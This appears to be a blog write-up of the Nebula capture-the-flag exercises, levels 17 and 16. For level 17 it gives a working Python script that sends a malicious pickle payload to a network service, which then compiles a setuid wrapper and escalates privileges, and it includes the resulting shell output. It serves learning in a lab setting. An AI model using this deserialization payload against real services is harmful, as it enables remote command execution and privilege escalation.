Exploit Exercises Nebula — level17

Initial reading reveals that the issue here is serialization via pickle (even if you’re not pythonaut it does stand out in the code).

After going for documentation one can immediately spot following line:

Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

Fair enough. A little bit of digging revealed this. Looks like the game is over. Let’s try that out:

#!/usr/bin/python
import pickle
import socket

egg = "cos\nsystem\n(S'gcc /tmp/wrap.c -o /tmp/wrap && chmod +s /tmp/wrap'\ntR."

print egg

s = socket.socket()
host = "192.168.1.18"
port = 10007

s.connect((host, port))
print s.recv(1024)
s.send(egg)
s.close

Here wrap.c is just a C wrapper for system("/bin/getflag") function; Also instead of using python script you can just nc egg string. Continuing:

level17@nebula:~$ /tmp/wrap
You have successfully executed getflag on a target account

Great success.

Addendum: I did not stop on reading documentation, a little bit of googling revealed this, this, and this. All three links are worth reading.

Exploit Exercises Nebula — level16

Long time no see. Again: trips, trips, trips!

It turned out that I couldn’t solve this level all by myself. It’s pretty trivial what needs to be done however I couldn’t find a way to do it. So, without further ado I recommend reading this or this.

Also I’d like to give an advice here — Never give up; If you know that you did your best don’t be ashamed to look for solutions. Contemplate them and move on. After all learning from others is the best method to learn.